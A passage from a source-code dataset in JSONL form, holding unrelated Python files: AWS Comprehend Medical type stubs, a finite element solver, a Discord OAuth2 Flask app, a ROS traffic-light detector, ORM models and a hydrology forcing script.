\"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartPHIDetectionJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect protected health information (PHI).\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_phi_detection_job)\n \"\"\"\n def start_rx_norm_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medication entities and link them to the\n RxNorm ontology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_rx_norm_inference_job)\n \"\"\"\n def start_snomedct_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medical concepts and link them to the\n SNOMED-CT ontology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_snomedct_inference_job)\n \"\"\"\n def stop_entities_detection_v2_job(\n self, *, JobId: str\n ) -> StopEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Stops a medical entities detection job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_entities_detection_v2_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_entities_detection_v2_job)\n \"\"\"\n def stop_icd10_cm_inference_job(self, *, JobId: str) -> StopICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferICD10CM inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_icd10_cm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_icd10_cm_inference_job)\n \"\"\"\n def stop_phi_detection_job(self, *, JobId: str) -> StopPHIDetectionJobResponseTypeDef:\n \"\"\"\n Stops a protected health information (PHI) detection job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_phi_detection_job)\n \"\"\"\n def stop_rx_norm_inference_job(self, *, JobId: str) -> StopRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferRxNorm inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_rx_norm_inference_job)\n \"\"\"\n def stop_snomedct_inference_job(self, *, JobId: str) -> StopSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Stops an InferSNOMEDCT inference job in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.stop_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#stop_snomedct_inference_job)\n \"\"\"\n","sub_path":"typings/mypy_boto3/comprehendmedical/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":21323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"207224530","text":"import numpy as np \nimport itertools as it\nimport math as mi\ndef u_arrangement(data,Global_displacement,s,u_element,t):\n for name, age in data.items(): # for printing the value's key\n if age == s:\n i=name\n u_element[t][0]=Global_displacement[i][0]\n u_element[t+1][0]=Global_displacement[i+1][0]\n return u_element\n\ndef assemble_function(data,Assignment_matrixs,s,j):\n for name, age in data.items(): # for printing the value's key\n if age == s:\n i=name\n Assignment_matrixs[j][i]=1\n Assignment_matrixs[j+1][i+1]=1\n return(Assignment_matrixs)\n\ndef Material_routine(MU,lamda,u_element,B):\n #material routine will return the C_t matrixs\n C_elastic=np.array([[2*MU+lamda,lamda,0],[lamda,2*MU+lamda,0],[0,0,MU]])\n C_tangential=C_elastic \n Strain_element=np.zeros((3,1))\n Strain_element= B @ u_element \n print(\"Strain_element:\\n\",Strain_element)\n stress_element= C_tangential @ Strain_element\n return [C_tangential,stress_element]\n\ndef Element_routine(Xe,Element_stiffness_matrixs,MU,lamda,u_element,F_int_Element,Le,thickness_plate):\n #element routien will return the elements stiffness matrixs\n x_values=np.array([-0.57735,-0.57735,0.57735,-0.57735,-0.57735,0.57735,0.57735,0.57735])\n Element_stiffness_matrixs=np.zeros((8,8))\n F_int_Element=np.zeros((8,1))\n for i in range(0,8,2):\n x1=x_values[i]\n x2=x_values[i+1]\n derivative_x= np.array([[-(1-x2),(1-x2),-(1+x2),(1+x2)],[-(1-x1),-(1+x1),(1-x1),(1+x1)]]) * (1/4)\n Jacobin_matrixs = derivative_x @ Xe\n B_vector= np.linalg.inv(Jacobin_matrixs) @ derivative_x\n B=np.array([[B_vector[0][0],0,B_vector[0][1],0,B_vector[0][2],0,B_vector[0][3],0],[0,B_vector[1][0],0,B_vector[1][1],0,B_vector[1][2],0,B_vector[1][3]],[B_vector[1][0],B_vector[0][0],B_vector[1][1],B_vector[0][1],B_vector[1][2],B_vector[0][2],B_vector[1][3],B_vector[0][3]]])\n [C_tangential,stress_element]=Material_routine(MU,lamda,u_element,B) \n Element_stiffness_matrixs= Element_stiffness_matrixs + (np.transpose(B) @ C_tangential @ B)* np.linalg.det(Jacobin_matrixs)*thickness_plate\n F_int_Element= F_int_Element + (np.transpose(B) @ stress_element ) * np.linalg.det(Jacobin_matrixs)*thickness_plate\n #F_int_Element_1= Element_stiffness_matrixs @ u_element\n #if(np.linalg.norm(F_int_Element)==np.linalg.norm(F_int_Element_1)):\n #print(\"yes\")\n return [Element_stiffness_matrixs,F_int_Element]\n\n#Elastic program for 2D Bilinear Element \n#Here, we are considering a point load as for building the basic strucutre for the required element\n#internal parameters\nyield_stress=70*10**-6\nYoungs_modulus=210E9 #N/meters\nPoissons_ratio=0.30\nMU=(Youngs_modulus/(2*(1+Poissons_ratio)))\nlamda=((Poissons_ratio*Youngs_modulus)/((1-2*Poissons_ratio)*(1+Poissons_ratio)))\nprint(MU)\nprint(lamda)\nL= eval(input('Enter the length of the plat in meters\\n'))\nheight_plate = eval(input('Enter the height of the plat in meters\\n'))\nthickness_plate = eval(input(\"Enter the thickness of the plate meters\\n\"))\nN=eval(input('Enter the number of elements in the x-direction\\n'))\nM=eval(input('Enter the number of elements in the y-direction\\n'))\nLe=L/N #element length\nHe=height_plate/M #element height\ntotal_nodes= (N+1)*(M+1)\nprint(total_nodes)\ndelta_u=np.zeros((2*total_nodes,1))\nElement_stiffness_matrixs=np.zeros((8,8))\nGlobal_F_external=np.zeros((2*total_nodes,1))\nGlobal_plastic_strain=np.zeros((3,M*N))\nGlobal_displacement=np.zeros((2*total_nodes,1))\nu_element=np.zeros((8,1))\nF_int_Element=np.zeros((8,1))\n#print(\"Enter the forces value in newton for each node of interest\\n\")\n#print(\"Enter zero if no forces is applied on the node\\n\")\n# The force part to be made into incremental wise after figuring the flow of the program\nXe=np.array([[0,0],[Le,0],[0,He],[Le,He]])\nx_disp=np.array([[Le,0],[Le,0],[Le,0],[Le,0]])\ny_disp=np.array([[0,He],[0,He],[0,He],[0,He]])\nNode_Numbering= np.zeros(((M+1),(N+1)))\ns=0\ns1=0\ns2=0\ns3=0\ns4=0\nk=1\nk1=0\ndata={}\nR_delta_u=np.ones((2*total_nodes,1))\nfor i in range(0,2*total_nodes,2):\n k1=k1+1\n data.update({i:k1})\nfor i in range(0,M+1):\n for j in range(0,N+1):\n Node_Numbering[i][j]=k \n k=k+1\nprint(Node_Numbering)\ncount=0\n\nwhile(np.linalg.norm(R_delta_u,np.inf) > (0.005*np.linalg.norm(Global_displacement,np.inf))):\n count=count+1\n Global_stiffness_matrixs=np.zeros((2*total_nodes,2*total_nodes))\n Global_F_internal=np.zeros((2*total_nodes,1))\n print(np.linalg.norm(R_delta_u,np.inf))\n print(np.linalg.norm(Global_displacement,np.inf))\n for i in range(0,M):\n for j in range(0,N):\n Assignment_matrixs=np.zeros((8,2*total_nodes))\n s=i\n s1=Node_Numbering[s][j] #s1-first node of the local element\n s2=Node_Numbering[s][j+1] #s2-second node of the local element\n s3=Node_Numbering[s+1][j] #s3-third node of the local element\n s4=Node_Numbering[s+1][j+1] #s4-fourth node of the local element\n print('Element node:',s1,s2,s3,s4)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s1,0)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s2,2)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s3,4)\n Assignment_matrixs=assemble_function(data,Assignment_matrixs,s4,6)\n u_element=u_arrangement(data,Global_displacement,s1,u_element,0)\n u_element=u_arrangement(data,Global_displacement,s2,u_element,2)\n u_element=u_arrangement(data,Global_displacement,s3,u_element,4)\n u_element=u_arrangement(data,Global_displacement,s4,u_element,6)\n if (j>0):\n Xe = Xe + x_disp\n [Element_stiffness_matrixs,F_int_Element] = Element_routine(Xe,Element_stiffness_matrixs,MU,lamda,u_element,F_int_Element,Le,thickness_plate)\n Global_stiffness_matrixs=Global_stiffness_matrixs + (np.transpose(Assignment_matrixs) @ Element_stiffness_matrixs @ Assignment_matrixs)\n F=(np.transpose(Assignment_matrixs) @ F_int_Element)\n Global_F_internal=Global_F_internal + F\n if((M*N)>1):\n Xe=Xe + y_disp \n print('The obtained stiffness matrixa is:\\n')\n print(Global_stiffness_matrixs)\n print(\"Internal_force:\\n\")\n print(Global_F_internal)\n Global_F_external[3][0]=-100\n #Global_F_external[6][0]=-100\n G=Global_F_internal-Global_F_external\n print(\"G:\",G)\n Reduced_Global_stiffness_matrix=Global_stiffness_matrixs\n Reduced_displacement=Global_displacement\n Reduced_G=G\n A=[]\n #Reduction of matirxs sizes\n for j in range(0,M+1,1): \n for name, age in data.items(): # for printing the value's key\n if age == Node_Numbering[j][0]:\n i=name\n A.append(i)\n A.append(i+1)\n A=np.asarray(A)\n print(A)\n #A=np.delete(A,[2,3],axis=0)\n if(count==1):\n R_delta_u=np.delete(delta_u,A,axis=0)\n Reduced_Global_stiffness_matrix= np.delete(Reduced_Global_stiffness_matrix,A,axis=0)\n Reduced_Global_stiffness_matrix= np.delete(Reduced_Global_stiffness_matrix,A,axis=1)\n Reduced_G=np.delete(Reduced_G,A,axis=0)\n Reduced_displacement=np.delete(Reduced_displacement,A,axis=0)\n #Reduced_F_ext=np.delete(Global_F_external,A,axis=0)\n #calculation part\n print(\"reduced k matrixs\",Reduced_Global_stiffness_matrix)\n K_inv=np.linalg.inv(Reduced_Global_stiffness_matrix)\n #R_delta_u= K_inv @ Reduced_F_ext\n #print(R_delta_u)\n print(\"Reduced G\",Reduced_G)\n R_delta_u=(np.linalg.inv(Reduced_Global_stiffness_matrix)) @ Reduced_G\n print(\"r_DELTA_U\",R_delta_u)\n Reduced_displacement=Reduced_displacement - R_delta_u\n for i in range(0,len(A),1):\n Reduced_displacement=np.insert(Reduced_displacement,A[i],Global_displacement[A[i]])\n #R_delta_u=np.insert(R_delta_u,A[i],delta_u[i])\n Global_displacement=(Reduced_displacement.reshape(2*total_nodes,1))\nprint(\"displacement:\\n\",Global_displacement)\nprint(\"Iteration number:\",count)","sub_path":"elastic_file.py","file_name":"elastic_file.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"32246496","text":"import requests\nimport os\nurl = \"http://i0.hdslb.com/bfs/article/b394991940df5df463669e17f76ef40f83b47fc3.jpg\"\nroot = \"D:/360MoveData/Users/Windows10/Desktop/爬虫/\"\t\t#保存地址\n#给图片在url上的原名\npath = root +url.split('/')[-1]\ntry:\n #如果没有,建文件夹\n if not os.path.exists(root):\n os.mkdir(root)\n #无重名文件\n if not os.path.exists(path):\n r = requests.get(url)\n with open(path, 'wb') as f:\n f.write(r.content)\n f.close()\n print(\"文件保存成功\")\n else:\n print(\"文件已存在\")\nexcept:\n print(\"爬取失败\")\n","sub_path":"python/jupyter/jupyter/爬虫查看/爬虫下载代码.py","file_name":"爬虫下载代码.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"242495101","text":"from setuptools import setup, find_packages\n\ntry:\n description = file('README.txt').read()\nexcept IOError:\n description = ''\n\nversion = \"0.1.3\"\n\nsetup(name='simpypi',\n version=version,\n description=\"Simple pypi package\",\n long_description=description,\n classifiers=[], # Get strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n author='Jeff Hammel',\n author_email='jhammel@mozilla.com',\n url='http://k0s.org/mozilla/hg/simpypi',\n license=\"MPL\",\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'WebOb',\n 'pkginfo',\n 'FileServer >= 0.2.1'\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [console_scripts]\n simpypi = simpypi.factory:main\n \"\"\",\n )\n","sub_path":"pypi_install_script/simpypi-0.1.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"221835812","text":"from random import randint\n\n\n# Генератор вычленения полей из массива словарей\ndef field(items, *args):\n assert len(args) > 0\n for item in items:\n (len(args) > 1 or item[args[0]] is not None) and \\\n (yield {arg: item[arg] for arg in args if item[arg] is not None}\n if len(args) > 1 else item[args[0]])\n\n\n# Гене��атор списка случайных чисел\ndef gen_random(begin, end, num_count):\n for _ in range(num_count):\n yield randint(begin, end)\n","sub_path":"librip/gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"647973356","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight, Waypoint\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport math\nimport sys\nimport tf\nfrom timeit import default_timer as timer\nimport yaml\n\nFREQUENCY = 10.\nMAX_DISTANCE = 100000\nSTATE_COUNT_THRESHOLD = 3\n\n\nclass TLDetector(object):\n def __init__(self):\n rospy.init_node('tl_detector')\n\n rospy.logwarn(\"### Traffic Light Detector Initialization ....\")\n\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n self.image_processing_time = 0\n\n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n self.bridge = CvBridge()\n self.light_classifier = TLClassifier()\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n rospy.spin()\n\n def pose_cb(self, msg):\n self.pose = msg\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n def image_cb(self, msg):\n if self.image_processing_time > 0:\n self.image_processing_time -= self.hertz_to_seconds(FREQUENCY)\n return\n\n self.has_image = True\n self.camera_image = msg\n start_detection = timer()\n light_wp, state = self.process_traffic_lights()\n end_detection = timer()\n self.image_processing_time = end_detection - start_detection\n\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n\n if state == TrafficLight.RED or state == TrafficLight.YELLOW:\n light_wp = light_wp\n else:\n light_wp = -1\n\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n\n def hertz_to_seconds(self, hertz):\n return hertz / 60\n\n def get_light_state(self, light):\n if (not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n # Get classification\n predicted = self.light_classifier.get_classification(cv_image)\n\n rospy.logdebug(\"traffic light state: %d\", light.state)\n\n return predicted\n\n def get_nearest_index(self, pose, positions):\n index = -1\n min_distance = MAX_DISTANCE\n\n for i in range(len(positions)):\n dist = self.distance_between_pos(pose, positions[i].pose.pose.position)\n if dist < min_distance:\n index = i\n min_distance = dist\n\n return index\n\n def get_nearest_waypoint(self, pose):\n return self.get_nearest_index(pose, self.waypoints.waypoints)\n\n def get_nearest_stop_line(self, pose):\n return self.get_nearest_index(pose, self.get_stop_lines())\n\n def get_stop_lines(self):\n stop_lines = []\n for light_position in self.config['stop_line_positions']:\n point = Waypoint()\n point.pose.pose.position.x = light_position[0]\n point.pose.pose.position.y = light_position[1]\n point.pose.pose.position.z = 0.0\n stop_lines.append(point)\n return stop_lines\n\n def get_nearest_light(self, pose):\n return self.get_nearest_index(pose, self.lights)\n\n def distance_between_pos(self, pos_a, pos_b):\n return math.sqrt((pos_a.x - pos_b.x) ** 2 + (pos_a.y - pos_b.y) ** 2 + (pos_a.z - pos_b.z) ** 2)\n\n def process_traffic_lights(self):\n light = None\n distance_tolerance = 300\n stop_line_position = None\n\n if self.pose:\n car_index = self.get_nearest_waypoint(self.pose.pose.position)\n car_position = self.waypoints.waypoints[car_index].pose.pose.position\n\n light_index = self.get_nearest_light(car_position)\n if light_index != -1:\n light_waypoint_index = self.get_nearest_waypoint(self.lights[light_index].pose.pose.position)\n light_position = self.waypoints.waypoints[light_waypoint_index].pose.pose.position\n\n if light_waypoint_index > car_index:\n distance_to_traffic_light = self.distance_between_pos(car_position, light_position)\n if distance_to_traffic_light < distance_tolerance:\n light = self.lights[light_index]\n stop_line_index = self.get_nearest_stop_line(light_position)\n stop_line_position = self.get_stop_lines()[stop_line_index].pose.pose\n stop_line_waypoint = self.get_nearest_waypoint(stop_line_position.position)\n\n if light and stop_line_position:\n state = self.get_light_state(light)\n return stop_line_waypoint, state\n\n return -1, TrafficLight.UNKNOWN\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110736265","text":"#coding=gbk\r\n'''\r\nCreated on 2019.5.21\r\n\r\n@author: G2435\r\n'''\r\n# 除法的数为浮点数\r\n# Python特有的除法整除为 //\r\n# 幂运算符 **\r\n# 取余%\r\n# + - * / % // ** () -\r\n# 优先级 () \r\n# **\r\n# - \r\n# * / // %\r\n# + -\r\nfrom math import *\r\nfrom docutils.nodes import math\r\np = 5423.5346\r\n\r\nm = 4\r\nn = 2\r\ns = 4.9\r\nx = m/n\r\nw = m%3\r\nprint(w)\r\nq = s//n\r\nprint(x)\r\nprint(q)\r\nprint(m**s)\r\nprint(2**600)\r\n","sub_path":"Python学习基础知识/python基础/第二节:Python语言基础/数字.py","file_name":"数字.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"469809792","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport json\nfrom datetime import datetime, timedelta, date\n\nfrom pony.orm import *\n\nimport gcfg\n\n#sql_debug(True)\ndb = Database()\n\nclass Repo(db.Entity):\n name = Required(unicode, unique=True)\n author = Optional(unicode)\n description = Optional(str)\n created = Optional(datetime)\n updated = Optional(datetime)\n view_count = Optional(int, default=0)\n down_count = Optional(int, default=0)\n builds = Set(\"Build\")\n\nclass Build(db.Entity):\n repo = Optional(Repo)\n downloadable = Optional(bool, default=False)\n tag = Optional(unicode)\n sha = Optional(unicode)\n updated = Optional(datetime)\n down_count = Optional(int, default=0)\n files = Set(\"File\")\n jobs = Set(\"Job\")\n latest_job = Optional(int, default=0)\n osarchs = Optional(LongStr) # json data: [{\"windows\": [\"amd64\", \"386\"], ...]\n\n status = Optional(unicode) # ?\n time_used = Optional(int) # ?\n version = Optional(unicode) #?\n\n composite_key(repo, tag)\n\nclass Job(db.Entity):\n build = Required(Build)\n status = Optional(unicode, default='initing')\n created = Optional(datetime)\n updated = Optional(datetime)\n output = Optional(LongStr, default='')\n gobuildrc = Optional(LongStr)\n\nclass File(db.Entity):\n build = Optional(Build)\n reponame = Optional(unicode)\n pkg_type = Optional(unicode, default='binary') # source or binary\n os = Optional(unicode, default='linux')\n arch = Optional(unicode, default='amd64')\n loglink = Optional(unicode)\n outlink = Optional(unicode)\n size = Optional(int, default=0)\n md5 = Optional(unicode)\n sha = Optional(unicode)\n\nclass Timer(db.Entity):\n email = Required(unicode)\n mission = Required(unicode)\n created = Optional(date)\n count = Optional(int, default=1)\n\nif gcfg.db.dbtype == 'sqlite':\n db.bind('sqlite', './test_db.sqlite', create_db=True)\nelse:\n db.bind(gcfg.db.dbtype, \n host=gcfg.db.host, \n user=gcfg.db.username, \n passwd=gcfg.db.password, \n db=gcfg.db.dbname)\n\ndb.generate_mapping(create_tables=True)\n\nif __name__ == '__main__':\n with db_session:\n repo = Repo(name='github.com/gobuild/got')\n repo.author = 'lunny'\n repo.description = 'this is sample repo'\n repo.updated = datetime.today()\n repo.view_count = 10\n repo.down_count = 7\n\n build = Build(repo=repo)\n build.tag = 'branch:master'\n build.sha = 'slkjfaefr3jr2134j2l3krj'\n build.time_used = 1024\n build.updated = datetime.today()\n build.downloadable = False\n build.down_count = 3\n build.details = 'lslxlsla build.....'\n build.version = 'go 1.3.1rc'\n\n file = File(build=build)\n file.reponame = repo.name\n file.pkg_type = 'binary'\n file.os='windows'\n file.arch = 'amd64'\n file.outlink = 'http://www.baidu.com'\n file.loglink = 'http://www.baidu.com'\n file.md5 = 'slkjfl213kj4124'\n file.sha = 'sssshhhhsej23423467890'\n file.size = 1025\n\n build = Build(repo=repo)\n build.tag = 'tag:v1.0.2'\n build.sha = 'ssssslkjfaefr3134j2l3krj'\n build.time_used = 104\n build.updated = datetime.today()\n build.down_count = 2\n build.downloadable = True\n build.status = 'build error'\n build.osarchs = '[[\"windows\", [\"amd64\", \"arm\"]], [\"linux\", [\"amd64\"]]]'\n\n@db_session\ndef add_record(phoneno, jsondata):\n ''' True or False '''\n phone = Phone.get(number=phoneno)\n if not phone:\n return False\n args = dict(phone=phone,\n created = datetime.fromtimestamp(time.time()),\n data = json.dumps(jsondata))\n JobRecord(**args)\n return True\n\n@db_session\ndef get_latest_record(devno, strdatetime):\n ''' None or data '''\n stamp = time.mktime(time.strptime(strdatetime, '%Y-%m-%d'))\n start_time = datetime.fromtimestamp(stamp)\n to_time = start_time + timedelta(days=1)\n latest = select(p for p in JobRecord if p.created > start_time and \n p.created < to_time and p.phone.number == devno).order_by(desc(JobRecord.created))[:1]\n if not latest:\n return None\n latest = latest[0]\n return dict(phoneno=latest.phone.number, created=latest.created, data=json.loads(latest.data))\n\n@db_session\ndef get_timers(email):\n return select(t for t in Timer if t.email == email)[:]\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"366842552","text":"import os, sys, ctypes\nfrom flask import Flask, g, session, redirect, request, url_for, jsonify\nfrom requests_oauthlib import OAuth2Session\nfrom waitress import serve\n\nctypes.windll.kernel32.SetConsoleTitleW(\"Anti-Cheat OAuth2 module\")\n\nOAUTH2_CLIENT_ID = sys.argv[1]\nOAUTH2_CLIENT_SECRET = sys.argv[2]\nHOST = sys.argv[3]\nPORT = sys.argv[4]\nREDIRECT_URL = sys.argv[5]\nOAUTH2_REDIRECT_URI = 'http://' + HOST + ':' + PORT + '/callback'\n\nAPI_BASE_URL = os.environ.get('API_BASE_URL', 'https://discordapp.com/api')\nAUTHORIZATION_BASE_URL = API_BASE_URL + '/oauth2/authorize'\nTOKEN_URL = API_BASE_URL + '/oauth2/token'\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = OAUTH2_CLIENT_SECRET\n\nif 'http://' in OAUTH2_REDIRECT_URI:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true'\n\n\ndef token_updater(token):\n session['oauth2_token'] = token\n\n\ndef make_session(token=None, state=None, scope=None):\n return OAuth2Session(\n client_id=OAUTH2_CLIENT_ID,\n token=token,\n state=state,\n scope=scope,\n redirect_uri=OAUTH2_REDIRECT_URI,\n auto_refresh_kwargs={\n 'client_id': OAUTH2_CLIENT_ID,\n 'client_secret': OAUTH2_CLIENT_SECRET,\n },\n auto_refresh_url=TOKEN_URL,\n token_updater=token_updater)\n\n\n@app.route('/')\ndef index():\n scope = request.args.get(\n 'scope',\n 'identify guilds')\n discord = make_session(scope=scope.split(' '))\n authorization_url, state = discord.authorization_url(AUTHORIZATION_BASE_URL)\n session['oauth2_state'] = state\n return redirect(authorization_url)\n\n\n@app.route('/callback')\ndef callback():\n if request.values.get('error'):\n return request.values['error']\n discord = make_session(state=session.get('oauth2_state'))\n token = discord.fetch_token(\n TOKEN_URL,\n client_secret=OAUTH2_CLIENT_SECRET,\n authorization_response=request.url)\n session['oauth2_token'] = token\n return redirect(url_for('.me'))\n\n\n@app.route('/me')\ndef me():\n discord = make_session(token=session.get('oauth2_token'))\n guilds = discord.get(API_BASE_URL + '/users/@me/guilds').json()\n identify = discord.get(API_BASE_URL + '/users/@me').json()\n userid = str(identify['id'])\n f=open(\"servers_lists\\\\\" + userid + \"_servers_list.txt\", \"w+\", encoding=\"utf-8\")\n for entry in guilds:\n f.write(entry['id'] + '\\n')\n f.close()\n return redirect(REDIRECT_URL)\n\nserve(app, host=\"0.0.0.0\", port=PORT)\n","sub_path":"scripts/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411019113","text":"import WRF_Hydro_forcing as whf\nimport logging\nimport os\nimport sys\nimport re\nfrom ConfigParser import SafeConfigParser\nimport optparse\nimport shutil\n\n\"\"\"Short_Range_Forcing\nPerforms regridding,downscaling, bias\ncorrection (if needed), and layering/mixing \nof data products associated with the Short Range\nforcing configuration. Invokes methods in the\nWRF_Hydro_forcing module and input parameters\nthat are defined in the wrf_hydro_forcing.parm\nparameter/configuration file. Logs to a log\nfile that is created in the same directory\nfrom where this script is executed.\n\"\"\"\n\ndef forcing(action, prod, file, prod2=None, file2=None):\n \"\"\"Peforms the action on the given data\n product and corresponding input file.\n\n Args:\n action (string): Supported actions are:\n 'regrid' - regrid and downscale\n 'bias' - bias correction \n (requires two \n products and two files)\n 'layer' - layer (requires two\n products and two files)\n prod (string): The first product [mandatory option]:\n (HRRR or RAP)\n file (string): The file name (full path not necessary,\n this is derived from the Python config/\n param file and the YYYMMDD portion of \n the file name.\n\n prod2 (string): The second product (RAP or HRRR), default\n is None. Required for layering.\n file2 (string): The second file name, required for \n layering, default is None.\n Returns:\n None Performs the indicated action on the\n files based on the type of product and\n any other relevant information provided\n by the Python config/param file,\n wrf_hydro_forcing.parm\n \n \n \"\"\"\n\n # Read the parameters from the config/param file.\n parser = SafeConfigParser()\n parser.read('/d4/karsten/DFE/wrf_hydro_forcing/parm/wrf_hydro_forcing.parm')\n\n # Set up logging, environments, etc.\n 